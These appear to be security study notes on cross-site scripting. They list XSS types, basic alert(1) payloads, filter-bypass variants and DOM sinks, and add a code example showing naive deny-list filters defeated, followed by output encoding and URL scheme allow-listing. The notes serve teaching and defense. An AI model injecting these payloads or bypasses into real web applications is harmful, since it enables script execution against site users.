Notes

Cross-Site Scripting (XSS)

Reflected, stored, and DOM-based XSS — payloads and bypass patterns.

Types

  • Reflected — payload in request, echoed in response
  • Stored — payload persisted (DB, log), fired on view
  • DOM — sink written via JavaScript, no server reflection

Basic Payloads

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

Filter Bypasses

<ScRiPt>alert(1)</ScRiPt>
<img src=x onerror="&#97;lert(1)">
javas\tcript:alert(1)
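
Added example (not part of the original notes): each deny-list check below is a hypothetical filter paired with the payload from this page that gets past it, followed by output encoding and a scheme allow-list, which hold against all three. The function names, the un-obfuscated javascript: baseline and the example.invalid base URL are assumptions made for the illustration.

```javascript
// Added example: constructed code, not from the original notes.
// Each hypothetical deny-list check is paired with the page payload that defeats it.
const NAIVE_CHECKS = [
  { name: "case-sensitive tag match",
    blocks: (s) => s.includes("<script"),
    basic: "<script>alert(1)</script>",
    bypass: "<ScRiPt>alert(1)</ScRiPt>" },
  { name: "keyword match on handler body",
    blocks: (s) => s.includes("alert("),
    basic: "<img src=x onerror=alert(1)>",
    bypass: '<img src=x onerror="&#97;lert(1)">' },
  { name: "scheme prefix match",
    blocks: (s) => s.toLowerCase().startsWith("javascript:"),
    basic: "javascript:alert(1)",      // constructed baseline for the tab variant
    bypass: "javas\tcript:alert(1)" }, // \t is a literal tab character
];

// For each check: is the basic form blocked, and is the bypass form blocked?
function naiveResults() {
  return NAIVE_CHECKS.map((c) => ({
    name: c.name,
    basicBlocked: c.blocks(c.basic),
    bypassBlocked: c.blocks(c.bypass),
  }));
}

// HTML context: encode on output so no input can open a tag or close an attribute.
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(input).replace(/[&<>"']/g, (ch) => map[ch]);
}

// URL context: parse first, then allow-list the scheme. The WHATWG URL parser
// drops tab and newline characters before reading the scheme, so the check sees
// the same scheme a browser would. Returns the normalized URL or null.
function safeUrl(url, base = "https://example.invalid/") {
  let parsed;
  try { parsed = new URL(url, base); } catch { return null; }
  return ["http:", "https:"].includes(parsed.protocol) ? parsed.href : null;
}

for (const r of naiveResults()) console.log(r);
for (const c of NAIVE_CHECKS.slice(0, 2)) console.log(escapeHtml(c.bypass));
console.log(safeUrl(NAIVE_CHECKS[2].bypass), safeUrl("/account?tab=1"));
```

Encoding and scheme validation are per-context controls: escapeHtml covers HTML text and quoted attribute values, not script blocks or URL attributes, which is why safeUrl is separate.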

DOM Sinks to Look For

innerHTML, document.write, eval, location.href, outerHTML